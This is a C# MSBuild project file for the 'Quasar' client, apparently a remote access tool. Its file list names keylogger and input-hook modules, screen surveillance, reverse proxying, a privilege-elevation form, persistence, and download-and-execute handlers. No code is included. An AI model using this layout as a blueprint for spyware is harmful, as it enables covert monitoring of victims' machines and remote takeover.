Quasar/Client/Client.csproj

303 lines
17 KiB
XML

<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">x86</Platform>
<ProductVersion>8.0.30703</ProductVersion>
<SchemaVersion>2.0</SchemaVersion>
<ProjectGuid>{9F5CF56A-DDB2-4F40-AB99-2A1DC47588E1}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>xClient</RootNamespace>
<AssemblyName>Client</AssemblyName>
<TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<TargetFrameworkProfile>Client</TargetFrameworkProfile>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|x86' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>..\Bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|x86' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>..\Bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<PropertyGroup>
<StartupObject>xClient.Program</StartupObject>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Management" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Core\Helper\FileHelper.cs" />
<Compile Include="Core\Helper\FormatHelper.cs" />
<Compile Include="Core\Helper\NativeMethodsHelper.cs" />
<Compile Include="Core\Helper\PlatformHelper.cs" />
<Compile Include="Core\Helper\ScreenHelper.cs" />
<Compile Include="Core\Networking\Client.cs" />
<Compile Include="Core\Commands\CommandHandler.cs" />
<Compile Include="Core\Commands\ConnectionHandler.cs" />
<Compile Include="Core\Commands\FileHandler.cs" />
<Compile Include="Core\Commands\MiscHandler.cs" />
<Compile Include="Core\Commands\SurveillanceHandler.cs" />
<Compile Include="Core\Commands\SystemHandler.cs" />
<Compile Include="Core\Compression\SafeQuickLZ.cs" />
<Compile Include="Core\Elevation\CommandButton.cs">
<SubType>Component</SubType>
</Compile>
<Compile Include="Core\Elevation\FrmElevation.cs">
<SubType>Form</SubType>
</Compile>
<Compile Include="Core\Elevation\FrmElevation.Designer.cs">
<DependentUpon>FrmElevation.cs</DependentUpon>
</Compile>
<Compile Include="Core\Encryption\AES.cs" />
<Compile Include="Core\Encryption\SHA256.cs" />
<Compile Include="Core\Extensions\RegistryKeyExtensions.cs" />
<Compile Include="Core\Utilities\FileSplit.cs" />
<Compile Include="Core\Utilities\NativeMethods.cs" />
<Compile Include="Core\Utilities\UnsafeStreamCodec.cs" />
<Compile Include="Core\Compression\JpgCompression.cs" />
<Compile Include="Core\Extensions\SocketExtensions.cs" />
<Compile Include="Core\MouseKeyHook\Hook.cs" />
<Compile Include="Core\MouseKeyHook\HotKeys\HotKeyArgs.cs" />
<Compile Include="Core\MouseKeyHook\HotKeys\HotKeySet.cs" />
<Compile Include="Core\MouseKeyHook\HotKeys\HotKeySetCollection.cs" />
<Compile Include="Core\MouseKeyHook\HotKeys\HotKeySetsListener.cs" />
<Compile Include="Core\MouseKeyHook\IKeyboardEvents.cs" />
<Compile Include="Core\MouseKeyHook\IKeyboardMouseEvents.cs" />
<Compile Include="Core\MouseKeyHook\IMouseEvents.cs" />
<Compile Include="Core\MouseKeyHook\Implementation\AppEventFacade.cs" />
<Compile Include="Core\MouseKeyHook\Implementation\AppKeyListener.cs" />
<Compile Include="Core\MouseKeyHook\Implementation\AppMouseListener.cs" />
<Compile Include="Core\MouseKeyHook\Implementation\BaseListener.cs" />
<Compile Include="Core\MouseKeyHook\Implementation\ButtonSet.cs" />
<Compile Include="Core\MouseKeyHook\Implementation\Callback.cs" />
<Compile Include="Core\MouseKeyHook\Implementation\EventFacade.cs" />
<Compile Include="Core\MouseKeyHook\Implementation\GlobalEventFacade.cs" />
<Compile Include="Core\MouseKeyHook\Implementation\GlobalKeyListener.cs" />
<Compile Include="Core\MouseKeyHook\Implementation\GlobalMouseListener.cs" />
<Compile Include="Core\MouseKeyHook\Implementation\KeyboardState.cs" />
<Compile Include="Core\MouseKeyHook\Implementation\KeyListener.cs" />
<Compile Include="Core\MouseKeyHook\Implementation\MouseListener.cs" />
<Compile Include="Core\MouseKeyHook\Implementation\Subscribe.cs" />
<Compile Include="Core\MouseKeyHook\KeyEventArgsExt.cs" />
<Compile Include="Core\MouseKeyHook\KeyPressEventArgsExt.cs" />
<Compile Include="Core\Helper\KeyloggerHelper.cs" />
<Compile Include="Core\MouseKeyHook\MouseEventExtArgs.cs" />
<Compile Include="Core\MouseKeyHook\WinApi\AppMouseStruct.cs" />
<Compile Include="Core\MouseKeyHook\WinApi\CallbackData.cs" />
<Compile Include="Core\MouseKeyHook\WinApi\HookHelper.cs" />
<Compile Include="Core\MouseKeyHook\WinApi\HookIds.cs" />
<Compile Include="Core\MouseKeyHook\WinApi\HookNativeMethods.cs" />
<Compile Include="Core\MouseKeyHook\WinApi\HookProcedure.cs" />
<Compile Include="Core\MouseKeyHook\WinApi\HookProcedureHandle.cs" />
<Compile Include="Core\MouseKeyHook\WinApi\HookResult.cs" />
<Compile Include="Core\MouseKeyHook\WinApi\KeyboardHookStruct.cs" />
<Compile Include="Core\MouseKeyHook\WinApi\KeyboardNativeMethods.cs" />
<Compile Include="Core\MouseKeyHook\WinApi\Messages.cs" />
<Compile Include="Core\MouseKeyHook\WinApi\MouseNativeMethods.cs" />
<Compile Include="Core\MouseKeyHook\WinApi\MouseStruct.cs" />
<Compile Include="Core\MouseKeyHook\WinApi\Point.cs" />
<Compile Include="Core\MouseKeyHook\WinApi\ThreadNativeMethods.cs" />
<Compile Include="Core\Packets\ClientPackets\GetDesktopResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetDirectoryResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\DoDownloadFileResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetDrivesResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetKeyloggerLogsResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetProcessesResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetStartupItemsResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetSystemInfoResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\GetMonitorsResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\DoShellExecuteResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\SetUserStatus.cs" />
<Compile Include="Core\Packets\PacketHandler.cs" />
<Compile Include="Core\Packets\ServerPackets\DoShutdownAction.cs" />
<Compile Include="Core\Packets\ServerPackets\DoStartupItemAdd.cs" />
<Compile Include="Core\Packets\ServerPackets\DoUploadFile.cs" />
<Compile Include="Core\Packets\ServerPackets\GetDesktop.cs" />
<Compile Include="Core\Packets\ServerPackets\GetDirectory.cs" />
<Compile Include="Core\Packets\ServerPackets\DoPathDelete.cs" />
<Compile Include="Core\Packets\ServerPackets\DoPathRename.cs" />
<Compile Include="Core\Packets\ServerPackets\DoDownloadFile.cs" />
<Compile Include="Core\Packets\ServerPackets\DoDownloadFileCancel.cs" />
<Compile Include="Core\Packets\ServerPackets\GetDrives.cs" />
<Compile Include="Core\Packets\ServerPackets\GetKeyloggerLogs.cs" />
<Compile Include="Core\Packets\ServerPackets\GetProcesses.cs" />
<Compile Include="Core\Packets\ServerPackets\GetStartupItems.cs" />
<Compile Include="Core\Packets\ServerPackets\GetSystemInfo.cs" />
<Compile Include="Core\Packets\ServerPackets\DoProcessKill.cs" />
<Compile Include="Core\Packets\ServerPackets\GetMonitors.cs" />
<Compile Include="Core\Packets\ServerPackets\DoStartupItemRemove.cs" />
<Compile Include="Core\Packets\ServerPackets\DoShellExecute.cs" />
<Compile Include="Core\Packets\ServerPackets\DoShowMessageBox.cs" />
<Compile Include="Core\Packets\ServerPackets\DoClientUpdate.cs" />
<Compile Include="Core\Packets\ServerPackets\DoUploadAndExecute.cs" />
<Compile Include="Core\Packets\ServerPackets\DoVisitWebsite.cs" />
<Compile Include="Core\Packets\ServerPackets\DoMouseEvent.cs" />
<Compile Include="Core\Packets\ServerPackets\DoProcessStart.cs" />
<Compile Include="Core\ProtoBuf\CallbackAttributes.cs" />
<Compile Include="Core\ProtoBuf\Extensible.cs" />
<Compile Include="Core\ProtoBuf\ExtensibleUtil.cs" />
<Compile Include="Core\ProtoBuf\GlobalSuppressions.cs" />
<Compile Include="Core\ProtoBuf\KeyValuePairProxy.cs" />
<Compile Include="Core\ProtoBuf\ProtoConverterAttribute.cs" />
<Compile Include="Core\ProtoBuf\Serializers\ImmutableCollectionDecorator.cs" />
<Compile Include="Core\Utilities\Shell.cs" />
<Compile Include="Core\ReverseProxy\Packets\ReverseProxyConnect.cs" />
<Compile Include="Core\ReverseProxy\Packets\ReverseProxyConnectResponse.cs" />
<Compile Include="Core\ReverseProxy\Packets\ReverseProxyData.cs" />
<Compile Include="Core\ReverseProxy\Packets\ReverseProxyDisconnect.cs" />
<Compile Include="Core\ReverseProxy\ReverseProxyClient.cs" />
<Compile Include="Core\ReverseProxy\ReverseProxyCommandHandler.cs" />
<Compile Include="Core\SystemCore.cs" />
<Compile Include="Core\Packets\ClientPackets\SetStatus.cs" />
<Compile Include="Core\Packets\ClientPackets\GetAuthenticationResponse.cs" />
<Compile Include="Core\Packets\IPacket.cs" />
<Compile Include="Core\Packets\ServerPackets\DoClientDisconnect.cs" />
<Compile Include="Core\Packets\ServerPackets\DoDownloadAndExecute.cs" />
<Compile Include="Core\Packets\ServerPackets\DoClientUninstall.cs" />
<Compile Include="Core\Packets\ServerPackets\GetAuthentication.cs" />
<Compile Include="Core\Packets\ServerPackets\DoClientReconnect.cs" />
<Compile Include="Core\Packets\UnknownPacket.cs" />
<Compile Include="Core\ProtoBuf\BclHelpers.cs" />
<Compile Include="Core\ProtoBuf\BufferExtension.cs" />
<Compile Include="Core\ProtoBuf\BufferPool.cs" />
<Compile Include="Core\ProtoBuf\DataFormat.cs" />
<Compile Include="Core\ProtoBuf\Helpers.cs" />
<Compile Include="Core\ProtoBuf\IExtensible.cs" />
<Compile Include="Core\ProtoBuf\IExtension.cs" />
<Compile Include="Core\ProtoBuf\ImplicitFields.cs" />
<Compile Include="Core\ProtoBuf\Meta\AttributeMap.cs" />
<Compile Include="Core\ProtoBuf\Meta\BasicList.cs" />
<Compile Include="Core\ProtoBuf\Meta\CallbackSet.cs" />
<Compile Include="Core\ProtoBuf\Meta\MetaType.cs" />
<Compile Include="Core\ProtoBuf\Meta\RuntimeTypeModel.cs" />
<Compile Include="Core\ProtoBuf\Meta\SubType.cs" />
<Compile Include="Core\ProtoBuf\Meta\TypeFormatEventArgs.cs" />
<Compile Include="Core\ProtoBuf\Meta\TypeModel.cs" />
<Compile Include="Core\ProtoBuf\Meta\ValueMember.cs" />
<Compile Include="Core\ProtoBuf\NetObjectCache.cs" />
<Compile Include="Core\ProtoBuf\PrefixStyle.cs" />
<Compile Include="Core\ProtoBuf\ProtoContractAttribute.cs" />
<Compile Include="Core\ProtoBuf\ProtoEnumAttribute.cs" />
<Compile Include="Core\ProtoBuf\ProtoException.cs" />
<Compile Include="Core\ProtoBuf\ProtoIgnoreAttribute.cs" />
<Compile Include="Core\ProtoBuf\ProtoIncludeAttribute.cs" />
<Compile Include="Core\ProtoBuf\ProtoMemberAttribute.cs" />
<Compile Include="Core\ProtoBuf\ProtoReader.cs" />
<Compile Include="Core\ProtoBuf\ProtoWriter.cs" />
<Compile Include="Core\ProtoBuf\SerializationContext.cs" />
<Compile Include="Core\ProtoBuf\Serializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\ArrayDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\BlobSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\BooleanSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\ByteSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\CharSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\CompiledSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\DateTimeSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\DecimalSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\DefaultValueDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\DoubleSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\EnumSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\FieldDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\GuidSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\Int16Serializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\Int32Serializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\Int64Serializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\IProtoSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\IProtoTypeSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\ISerializerProxy.cs" />
<Compile Include="Core\ProtoBuf\Serializers\KeyValuePairDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\ListDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\MemberSpecifiedDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\NetObjectSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\NullDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\ParseableSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\PropertyDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\ProtoDecoratorBase.cs" />
<Compile Include="Core\ProtoBuf\Serializers\SByteSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\SingleSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\StringSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\SubItemSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\SurrogateSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\SystemTypeSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\TagDecorator.cs" />
<Compile Include="Core\ProtoBuf\Serializers\TimeSpanSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\TupleSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\TypeSerializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\UInt16Serializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\UInt32Serializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\UInt64Serializer.cs" />
<Compile Include="Core\ProtoBuf\Serializers\UriDecorator.cs" />
<Compile Include="Core\ProtoBuf\ServiceModel\ProtoBehaviorAttribute.cs" />
<Compile Include="Core\ProtoBuf\ServiceModel\ProtoBehaviorExtensionElement.cs" />
<Compile Include="Core\ProtoBuf\ServiceModel\ProtoEndpointBehavior.cs" />
<Compile Include="Core\ProtoBuf\ServiceModel\ProtoOperationBehavior.cs" />
<Compile Include="Core\ProtoBuf\ServiceModel\XmlProtoSerializer.cs" />
<Compile Include="Core\ProtoBuf\SubItemToken.cs" />
<Compile Include="Core\ProtoBuf\WireType.cs" />
<Compile Include="Core\Helper\GeoLocationHelper.cs" />
<Compile Include="Core\Utilities\Keylogger.cs" />
<Compile Include="Enums\PathType.cs" />
<Compile Include="Enums\RemoteDesktopAction.cs" />
<Compile Include="Enums\ShutdownAction.cs" />
<Compile Include="Enums\UserStatus.cs" />
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<Compile Include="Config\Settings.cs" />
<EmbeddedResource Include="Core\Elevation\FrmElevation.resx">
<DependentUpon>FrmElevation.cs</DependentUpon>
</EmbeddedResource>
<EmbeddedResource Include="Properties\Resources.resx">
<Generator>ResXFileCodeGenerator</Generator>
<LastGenOutput>Resources.Designer.cs</LastGenOutput>
<SubType>Designer</SubType>
</EmbeddedResource>
<Compile Include="Properties\Resources.Designer.cs">
<AutoGen>True</AutoGen>
<DependentUpon>Resources.resx</DependentUpon>
<DesignTime>True</DesignTime>
</Compile>
<None Include="Properties\Settings.settings">
<Generator>SettingsSingleFileGenerator</Generator>
<LastGenOutput>Settings.Designer.cs</LastGenOutput>
</None>
<Compile Include="Properties\Settings.Designer.cs">
<AutoGen>True</AutoGen>
<DependentUpon>Settings.settings</DependentUpon>
<DesignTimeSharedInput>True</DesignTimeSharedInput>
</Compile>
</ItemGroup>
<ItemGroup>
<Content Include="Core\MouseKeyHook\HotKeys\ReadMe.txt" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<PropertyGroup>
<PostBuildEvent>copy "$(TargetPath)" "$(TargetDir)client.bin" /Y</PostBuildEvent>
</PropertyGroup>
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
Other similar extension points exist, see Microsoft.Common.targets.
<Target Name="BeforeBuild">
</Target>
<Target Name="AfterBuild">
</Target>
-->
</Project>